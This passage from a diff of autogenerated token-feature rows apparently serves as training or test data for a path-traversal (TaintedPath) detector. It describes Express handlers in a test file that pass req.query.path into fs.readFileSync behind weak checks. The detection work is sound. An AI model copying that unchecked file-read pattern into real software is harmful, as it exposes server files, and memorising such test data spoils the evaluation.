fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:25:73:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:25:73:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:25:73:33 | normalize | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:25:73:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:25:73:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:35:73:38 | './' | stringConcatenatedWith | -endpoint- req.query.path | | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | calleeImports | path | @@ -7856,6 +71264,62 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:73:35:73:55 | './' + ... ry.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:44 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:44 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:44 | req | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:44 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:44 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:50 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:50 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:50 | req.query | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:50 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:50 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:42:73:55 | req.query.path | stringConcatenatedWith | './' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:73:46:73:50 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:46:73:50 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:46:73:50 | query | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:46:73:50 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:46:73:50 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:52:73:55 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:52:73:55 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:52:73:55 | path | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:52:73:55 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:52:73:55 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:7:75:28 | !path.s ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:7:75:28 | !path.s ... h("..") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:75:7:75:28 | !path.s ... h("..") | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:7:75:28 | !path.s ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:7:75:28 | !path.s ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:11 | path | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:22 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | exceptional return of path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | exceptional return of path.st ... h("..") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | exceptional return of path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | exceptional return of path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | exceptional return of path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | path.st ... h("..") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:8:75:28 | path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:75:13:75:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:75:13:75:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:75:13:75:22 | startsWith | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:75:13:75:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:75:13:75:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | calleeImports | path | @@ -7865,6 +71329,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:75:24:75:27 | ".." | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:6 | fs | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:76:5:76:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:76:8:76:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:76:8:76:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:76:8:76:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:76:8:76:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:76:8:76:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | calleeImports | fs | @@ -7874,6 +71363,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:76:21:76:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:7 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:7 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:7 | fs | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:7 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:7 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:20 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:20 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:20 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:20 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:20 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:78:6:78:26 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:78:9:78:20 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:78:9:78:20 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:78:9:78:20 | readFileSync | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:78:9:78:20 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:78:9:78:20 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | calleeImports | fs | @@ -7883,6 +71397,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:78:22:78:25 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:81:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | app.get ... ../'\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | app.get ... ../'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | app.get ... ../'\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | exceptional return of app.get ... ../'\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | exceptional return of app.get ... ../'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:1:91:2 | exceptional return of app.get ... ../'\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:5:81:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:5:81:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:5:81:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | calleeImports | express | @@ -7890,6 +71419,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:81:9:81:19 | '/absolute' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:81:21 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | calleeImports | express | @@ -7897,6 +71441,146 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | (req, r ... '../'\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | return of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:22:91:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:23:81:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | enclosingFunctionName | 